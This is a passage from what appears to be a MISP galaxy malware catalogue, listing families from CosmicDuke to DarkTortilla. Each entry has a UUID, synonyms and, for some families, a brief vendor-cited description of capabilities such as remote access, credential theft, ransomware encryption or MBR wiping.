Metadata key	Value
type	[]

CosmicDuke

Internal MISP references

UUID 14990e2c-81a2-4750-b9a8-7535d152e437 which can be used as unique global reference for CosmicDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cotx RAT

Internal MISP references

UUID 47190b56-5176-4e8b-8c78-fcc10e511fa2 which can be used as unique global reference for Cotx RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cova

Internal MISP references

UUID cad667c1-be0a-49db-b2fb-462082a04fbe which can be used as unique global reference for Cova in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Covicli

Covicli is a modified SSLeay32 dynamic library designated as a backdoor. The dynamic library allows the attacker to communicate with the C2 over openSSL.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Covicli.

Known Synonyms
`Covically`

Internal MISP references

UUID e8986c0c-2997-425d-ae4e-529f82d3fa48 which can be used as unique global reference for Covicli in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Covid22

Destructive "joke" malware that ultimately deploys a wiper for the MBR.

Internal MISP references

UUID d4796a4f-63f0-42f0-a043-fb91416c29d2 which can be used as unique global reference for Covid22 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CoViper

PCRisk notes that CoViper is yet another Coronavirus/COVID-19-themed malware infection, most likely proliferated as a file related to the pandemic. It operates by rewriting the system Master Boot Record (MBR). It does not delete the original, but rather creates a backup and replaces it with a custom MBR.

Typically, malicious software that modifies MBRs do so to prevent the Operating System (OS) from being booted (i.e., started). It also displays a screen-encompassing message, often containing a ransom message - this disables user access to the device.

Internal MISP references

UUID 4d7d8496-52a6-47dc-abfe-4997af6dc465 which can be used as unique global reference for CoViper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

COZYDUKE

CozyDuke is not simply a malware toolset; rather, it is a modular malware platform formed around a core backdoor component. This component can be instructed by the C&C server to download and execute arbitrary modules, and it is these modules that provide CozyDuke with its vast array of functionality. Known CozyDuke modules include: • Command execution module for executing arbitrary Windows Command Prompt commands • Password stealer module • NT LAN Manager (NTLM) hash stealer module • System information gathering module • Screenshot module

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular COZYDUKE.

Known Synonyms
`Cozer`
`CozyBear`
`CozyCar`
`EuroAPT`

Internal MISP references

UUID b461afd0-f5fd-4c25-8367-4235a6e8b9b1 which can be used as unique global reference for COZYDUKE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CrackedCantil

According to ANY.RUN, this is a dropper for win.privateloader and its execution will lead to a cascade of downloads with a large variety of additional malware. The families include more loaders, information stealers, cryptominers, a proxy bot, and ultimately also ransomware. The execution order is orchestrated, e.g. as in data is stolen and exfiltrated before encryption. It is distributed through advertized cracked software, e.g. IDA Pro.

Internal MISP references

UUID 000693a0-b4a6-4d8d-8276-d12403c71196 which can be used as unique global reference for CrackedCantil in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

crackshot

CRACKSHOT is a downloader that can download files, including binaries, and run them from the hard disk or execute them directly in memory. It is also capable of placing itself into a dormant state.

Internal MISP references

UUID cfa111c1-3740-4832-8e89-12a536f4fff9 which can be used as unique global reference for crackshot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CradleCore

Internal MISP references

UUID 6fb5bfff-4b10-43a4-ad3c-a1578f39e83e which can be used as unique global reference for CradleCore in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore - webarchive

Associated metadata

Metadata key	Value
type	[]

CRAT

According to Cisco Talos, CRAT is a remote access trojan with plugin capabilites, used by Lazarus since at least May 2020.

Internal MISP references

UUID ca901b56-b733-44af-aee2-38da79188dcb which can be used as unique global reference for CRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CREAMSICLE

Internal MISP references

UUID 9d193a65-dc18-4832-9daa-aab245cd1c86 which can be used as unique global reference for CREAMSICLE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CredoMap

Internal MISP references

UUID 37e6844c-4e45-4297-ac6e-afc98d37d994 which can be used as unique global reference for CredoMap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Credraptor

Internal MISP references

UUID ac75d0a3-bb99-4453-9567-a6c8ba87a706 which can be used as unique global reference for Credraptor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CreepySnail

Internal MISP references

UUID a95d4aaa-302e-4a3c-a071-ba8eed978920 which can be used as unique global reference for CreepySnail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CreepExfil

Internal MISP references

UUID fc743725-2fa6-48dd-8797-57e298375505 which can be used as unique global reference for CreepExfil in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Crenufs

Internal MISP references

UUID e8682902-7748-423a-8ba9-6f00d9fe7331 which can be used as unique global reference for Crenufs in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs - webarchive

Associated metadata

Metadata key	Value
type	[]

Crimson RAT

It was first discovered in 2017 and has since been used to attack organizations around the world. The malware is often distributed through phishing emails or by exploiting vulnerabilities in outdated security software. Once Crimson RAT is installed on a computer, it can be used to steal data, spy on users, and even take control of the infected computers.

Some of the features of Crimson RAT include:

Remote control of infected computers Data theft, such as passwords, files, and emails User spying Takeover of infected computers Locking of infected computers Extortion of payments

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Crimson RAT.

Known Synonyms
`SEEDOOR`
`Scarimson`

Internal MISP references

UUID a61fc694-a88a-484d-a648-db35b49932fd which can be used as unique global reference for Crimson RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CrimsonIAS

According to ThreatConnect, CrimsonIAS is a Delphi-written backdoor dating back to at least 2017. It enables operators to run command line tools, exfiltrate files, and upload files to the infected machine. CrimsonIAS is notable as it listens for incoming connections only; making it different from typical Windows backdoors that beacons out.

Internal MISP references

UUID 6f2a68d1-06a9-4657-98d8-590a6446e475 which can be used as unique global reference for CrimsonIAS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cring

Ransomware.

Internal MISP references

UUID f5a19987-d0b6-4cc3-89ab-d4540f2e9744 which can be used as unique global reference for Cring in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CrossLock

Internal MISP references

UUID 505dc6be-56f3-49ca-be11-45b3e78a4ac2 which can be used as unique global reference for CrossLock in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CROSSWALK

According to FireEye, CROSSWALK is a skeletal, modular backdoor capable of system survey and adding modules in response to C&C replies.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CROSSWALK.

Known Synonyms
`Motnug`
`ProxIP`
`TOMMYGUN`

Internal MISP references

UUID 7ca7c08b-36fd-46b3-8b9e-a8b0d4743433 which can be used as unique global reference for CROSSWALK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Croxloader

According to Trend Micro, this is a custom loader for win.cobalt_strike, used by Earth Longzhi (a subgroup of APT41).

Internal MISP references

UUID 48d697ec-aa34-4d98-83e4-17b736d59a85 which can be used as unique global reference for Croxloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CruLoader

Internal MISP references

UUID 22d90775-cdcc-4c80-bb0a-1503275671c7 which can be used as unique global reference for CruLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Crutch

Internal MISP references

UUID e7dc138f-00cb-4db6-a6e7-3ecac853285d which can be used as unique global reference for Crutch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cryakl

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cryakl.

Known Synonyms
`CryLock`

Internal MISP references

UUID 32fa6c53-b4fc-47f8-894c-1ea74180e02f which can be used as unique global reference for Cryakl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryLocker

Internal MISP references

UUID 980ea9fa-d29d-4a44-bb87-0c050f8ddeaf which can be used as unique global reference for CryLocker in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker - webarchive

Associated metadata

Metadata key	Value
type	[]

CrypMic

Internal MISP references

UUID 2fe1dd8c-23d8-40a6-b042-bd2c4012fea6 which can be used as unique global reference for CrypMic in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Crypt0l0cker

Internal MISP references

UUID 38b38f8c-944d-4062-bf35-561e8a81c8d2 which can be used as unique global reference for Crypt0l0cker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptBot

A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.

Internal MISP references

UUID 2274aaf6-4807-4cda-8f5b-16a757f4ff23 which can be used as unique global reference for CryptBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CrypticConvo

CrypticConvo is a dropper trojan which appears to be embedded in an automatic generator framework to deliver the FakeM trojan. According to PaloaltoNetworks CrypticConvo and several additional trojans are believed to be included in a meta framework used by the "Scarlet Mimic" threat actor in order to quickly evade AV systems.

Internal MISP references

UUID 972fbb7b-6945-42d8-ba88-a7b4e6fc1ad4 which can be used as unique global reference for CrypticConvo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptNET

According to OALabs, this ransomware has the following features: * Files are encrypted with AES CBC using a generated 256 bit key and IV. * The generated AES keys are encrypted using a hard coded RSA key and appended to the encrypted files.

Internal MISP references

UUID 99c468a2-c69f-4c9c-9941-0627052001b2 which can be used as unique global reference for CryptNET in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoClippy

Internal MISP references

UUID 7c296221-3945-4803-b25f-1e221b513f0d which can be used as unique global reference for CryptoClippy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoDarkRubix

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryptoDarkRubix.

Known Synonyms
`Ranet`

Internal MISP references

UUID c6d09bb2-5673-4b2b-b2cb-5d14f2568189 which can be used as unique global reference for CryptoDarkRubix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoJoker

CryptoJoker is an open source ransomware written in C#. CryptoJoker uses a combination of a "custom XOR" encryption and RSA. A private public/private pair key is generated for every computer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryptoJoker.

Known Synonyms
`PlutoCrypt`

Internal MISP references

UUID 01cb8122-7a24-436f-85d3-d6a306800f10 which can be used as unique global reference for CryptoJoker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoLocker

CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins.

Internal MISP references

UUID c5a783da-9ff3-4427-84c5-428480b21cc7 which can be used as unique global reference for CryptoLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoLuck

Internal MISP references

UUID 3ec67717-acd5-401b-8e9f-47e79edd07a0 which can be used as unique global reference for CryptoLuck in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoMix

A variant of CryptoMix is win.clop.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CryptoMix.

Known Synonyms
`Azer`
`CryptFile2`

Internal MISP references

UUID 55d5742e-20f5-4c9a-887a-4dbd5b37d921 which can be used as unique global reference for CryptoMix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoPatronum

CryptoPatronum is a ransomware that encrypts user data through AES-256 (CBC) and it asks for BTC / ETH in order to get back the original files. In the ransom note there is not a title but only a reference to crsss.exe: its original file name. Once the files are encrypted, CryptoPatronum adds a .enc extension.

Internal MISP references

UUID 738acbd6-d0b7-40fd-bc1b-d7fbb74cbbf9 which can be used as unique global reference for CryptoPatronum in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cryptorium

Internal MISP references

UUID b7240444-94a6-4d57-a6b3-ca38182eff7a which can be used as unique global reference for Cryptorium in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoShield

Internal MISP references

UUID 6855c491-1b18-4414-9e78-8bc17f0b5b98 which can be used as unique global reference for CryptoShield in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoShuffler

Internal MISP references

UUID 87048a24-7339-4d4e-a141-661cd32a6f1d which can be used as unique global reference for CryptoShuffler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CRYPTOSLAY

Internal MISP references

UUID 4c49912a-fe14-40e7-90eb-3ffb0b3453f2 which can be used as unique global reference for CRYPTOSLAY in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cryptowall

CryptoWall is a ransomware, is usually spread by spam and phishing emails, malicious ads, hacked websites, or other malware and uses a Trojan horse to deliver the malicious payload.

Internal MISP references

UUID 1cb63b32-cc65-4cdc-945a-e06a88cdd94b which can be used as unique global reference for Cryptowall in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoWire

Internal MISP references

UUID bc0c1e48-102c-4e6b-9b86-c442c4798159 which can be used as unique global reference for CryptoWire in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoFortress

Internal MISP references

UUID ae4aa1ef-4da0-4952-9583-9d47f84edad9 which can be used as unique global reference for CryptoFortress in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptoRansomeware

Internal MISP references

UUID 2f65f056-6cba-4a5b-9aaf-daf31eb76fc2 which can be used as unique global reference for CryptoRansomeware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CryptXXXX

Internal MISP references

UUID fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8 which can be used as unique global reference for CryptXXXX in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Crytox

Ransomware.

Internal MISP references

UUID c7fb0acb-018b-47eb-8555-5a0291e2505e which can be used as unique global reference for Crytox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CsExt

Internal MISP references

UUID c6a46f63-3ff1-4952-8350-fad9816b45c9 which can be used as unique global reference for CsExt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

csharp-streamer RAT

Internal MISP references

UUID 54d757df-8da2-4f6e-8789-8790d6a73e46 which can be used as unique global reference for csharp-streamer RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CTB Locker

Internal MISP references

UUID e8e28718-fe55-4d31-8b84-f8ff0acf0614 which can be used as unique global reference for CTB Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cuba

Ransomware.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cuba.

Known Synonyms
`COLDDRAW`

Internal MISP references

UUID 6d9dfc5f-4ebf-404b-ab5e-e6497867fe65 which can be used as unique global reference for Cuba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cuegoe

Internal MISP references

UUID 1dc53eb8-ffae-4823-9c11-3c01514398b9 which can be used as unique global reference for Cuegoe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cueisfry

Internal MISP references

UUID 64d40102-c296-4a85-9b9c-b3afb6d58e09 which can be used as unique global reference for Cueisfry in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cur1Downloader

Potential Lazarus sample.

Internal MISP references

UUID cca4f240-ac69-437e-b02a-5483ebef5087 which can be used as unique global reference for Cur1Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Curator

Profero describes this as a ransomware family using CryptoPP as library to enable file encryption with the Salsa20 algorithm and protecting the encryption keys with RSA2048.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Curator.

Known Synonyms
`Ever101`
`SunnyDay`

Internal MISP references

UUID f1d2093b-e008-4591-8a67-5b9c7684b8c6 which can be used as unique global reference for Curator in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cursed Murderer

Ransomware.

Internal MISP references

UUID 600a73bf-d699-4400-ac35-6aed4ae5e528 which can be used as unique global reference for Cursed Murderer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CustomerLoader

CustomerLoader is a .Net-based loader that drops more than 40 different malware families. It appeared in June 2023 and is being distributed via phishing, YouTube videos and malicious websites.

Internal MISP references

UUID b002e530-38d5-48cf-90a9-5731871fae32 which can be used as unique global reference for CustomerLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cutlet

Internal MISP references

UUID 8945d785-9d43-49ee-b210-4adeb8a24ab9 which can be used as unique global reference for Cutlet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cutwail

Internal MISP references

UUID 9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b which can be used as unique global reference for Cutwail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CyberGate

According to Subex Secure, CyberGate is a Remote Access Trojan (RAT) that allows an attacker to gain unauthorized access to the victim’s system. Attackers can remotely connect to the compromised system from anywhere around the world. The Malware author generally uses this program to steal private information like passwords, files, etc. It might also be used to install malicious software on the compromised systems.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CyberGate.

Known Synonyms
`Rebhip`

Internal MISP references

UUID 062d8577-d6e6-4c97-bcac-eb6eb1a50a8d which can be used as unique global reference for CyberGate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

CyberSplitter

Internal MISP references

UUID 8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa which can be used as unique global reference for CyberSplitter in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter - webarchive

Associated metadata

Metadata key	Value
type	[]

CycBot

Internal MISP references

UUID dcdd98a7-aad2-4a96-a787-9c4665bbb1b8 which can be used as unique global reference for CycBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Cyrat

According to gdatasoftware, Cyrat ransomware uses Fernet to encrypt files. This is a symmetric encryption method meant for small data files that fit into RAM. While Fernet is not unusual itself, it is not common for ransomware and in this case even problematic.

Internal MISP references

UUID 1995ed0a-81d9-43ca-9b38-6f001af84bbc which can be used as unique global reference for Cyrat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

cysxl

Internal MISP references

UUID 8db13fca-8f75-44dd-b507-e4d3f9c69d78 which can be used as unique global reference for cysxl in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dacls (Windows)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dacls (Windows).

Known Synonyms
`MATA`

Internal MISP references

UUID 7c2b19be-f06b-4b21-b003-144e92d291d1 which can be used as unique global reference for Dacls (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DADJOKE

DADJOKE was discovered as being distributed via email, targeting a South-East Asian Ministry of Defense. It is delivered as an embedded EXE file in a Word document using remote templates and a unique macro using multiple GET requests. The payload is deployed using load-order hijacking with a benign Windows Defender executable. Stage 1 has only beacon+download functionality, made to look like a PNG file. Additional analysis by Kaspersky found 8 campaigns over 2019 and no activity prior to January 2019, DADJOKE is attributed with medium confidence to APT40.

Internal MISP references

UUID 3cf1aa5a-c19d-4b50-a604-e445e1e2b4f1 which can be used as unique global reference for DADJOKE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DADSTACHE

Internal MISP references

UUID cd9aac83-bdd0-4622-ae77-405d5b9c1dc5 which can be used as unique global reference for DADSTACHE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Dairy

Internal MISP references

UUID 92960f1f-5099-4e38-a177-14a5e3b8d601 which can be used as unique global reference for Dairy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DanaBot

Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker.

Internal MISP references

UUID 4f7decd4-054b-4dd7-89cc-9bdb248f7c8a which can be used as unique global reference for DanaBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

danbot

Danbot is a backdoor malware that is originally written in C#. Recent versions of Danbot are written in C++. Danbot is capable of giving a remote attacker remote access features such as running a cmd command, upload and download files, move and copy files. The backdoor commands are transmitted by either using HTTP or DNS protocols. The commands are encapsulated in an XML file that gets stored in disk. Danbot's backdoor component picks up the XML file where it decodes and decrypts the commands.

Internal MISP references

UUID 98d3c6b3-c29f-46ba-b24d-88b135cd3183 which can be used as unique global reference for danbot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Daolpu

Internal MISP references

UUID 2e4139f0-f2b7-4507-a7f9-0ae48c1c2796 which can be used as unique global reference for Daolpu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkBit

Internal MISP references

UUID abf5436b-23e4-4dec-8c98-0e95a499be78 which can be used as unique global reference for DarkBit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkCloud Stealer

Stealer is written in Visual Basic.

Internal MISP references

UUID 43601d72-1df5-4d95-8cdc-ad9754aa5d72 which can be used as unique global reference for DarkCloud Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkComet

DarkComet is one of the most famous RATs, developed by Jean-Pierre Lesueur in 2008. After being used in the Syrian civil war in 2011, Lesuer decided to stop developing the trojan. Indeed, DarkComet is able to enable control over a compromised system through use of a simple graphic user interface. Experts think that this user friendliness is the key of its mass success.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkComet.

Known Synonyms
`Breut`
`Fynloski`
`klovbot`

Internal MISP references

UUID 5086a6e0-53b2-4d96-9eb3-a0237da2e591 which can be used as unique global reference for DarkComet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DARKDEW

Mandiant associates this with UNC4191, this malware spreads to removable drives.

Internal MISP references

UUID 16d9f98d-4da6-419d-89f7-8c30418255ae which can be used as unique global reference for DARKDEW in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkEye

Internal MISP references

UUID ccbc93b4-fd7a-4926-88f3-bcf5a1c530a5 which can be used as unique global reference for DarkEye in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkGate

First documented in 2018, DarkGate is a commodity loader with features that include the ability to download and execute files to memory, a Hidden Virtual Network Computing (HVNC) module, keylogging, information-stealing capabilities, and privilege escalation. DarkGate makes use of legitimate AutoIt files and typically runs multiple AutoIt scripts. New versions of DarkGate have been advertised on a Russian language eCrime forum since May 2023.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkGate.

Known Synonyms
`Meh`
`MehCrypter`

Internal MISP references

UUID 977ef666-33b7-41d4-9d98-15ab0d16bede which can be used as unique global reference for DarkGate in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkIRC

Internal MISP references

UUID 8258311c-0d64-4c6b-ab94-915e2cc267f0 which can be used as unique global reference for DarkIRC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkLoader

Internal MISP references

UUID 269be5a3-471c-4a4b-a5d7-97ce75579213 which can be used as unique global reference for DarkLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkMe

Internal MISP references

UUID 1dda5df9-5c92-44a4-b1c7-a09b71bc1553 which can be used as unique global reference for DarkMe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkMegi

Internal MISP references

UUID 3521faaa-1136-4e50-9fe2-3f33359e8b1d which can be used as unique global reference for DarkMegi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Darkmoon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Darkmoon.

Known Synonyms
`Chymine`

Internal MISP references

UUID 81ca4876-b4a4-43e9-b8a9-8a88709dd3d2 which can be used as unique global reference for Darkmoon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkPink

Internal MISP references

UUID f3522624-a704-4d74-8c21-1c863ab6d5eb which can be used as unique global reference for DarkPink in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkPulsar

Internal MISP references

UUID 1aecd6eb-80e2-4598-8504-d93f69c7a8f0 which can be used as unique global reference for DarkPulsar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkRat

Internal MISP references

UUID bcff979f-2b4b-41cc-86c9-fe1ea3adce6e which can be used as unique global reference for DarkRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkShell

DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry.

Internal MISP references

UUID 7fcb9d77-a685-4705-86f0-e62a7302e836 which can be used as unique global reference for DarkShell in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkSide (Windows)

FireEye describes DARKSIDE as a ransomware written in C and configurable to target files whether on fixed, removable disks, or network shares. The malware can be customized by the affiliates to create a build for specific victims.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DarkSide (Windows).

Known Synonyms
`BlackMatter`

Internal MISP references

UUID 625bcba0-faab-468e-b5ab-61116cb1b5cf which can be used as unique global reference for DarkSide (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Darksky

DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.

Internal MISP references

UUID d5f2e3c4-adf4-4156-98b1-b207f70522bb which can be used as unique global reference for Darksky in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkStRat

Internal MISP references

UUID b9692126-e6e9-4ab3-8494-959fd1269ff4 which can be used as unique global reference for DarkStRat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkTequila

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

Internal MISP references

UUID 374080b4-5e6c-4992-a7f5-def1f2975494 which can be used as unique global reference for DarkTequila in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

DarkTortilla

DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks® Counter Threat Unit™ (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.

From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.

Internal MISP references

UUID fa08ee9c-d0e8-4c49-8a4d-af8e36206219 which can be used as unique global reference for DarkTortilla in MISP communities and other software using the MISP galaxy

External references

Associated metadata

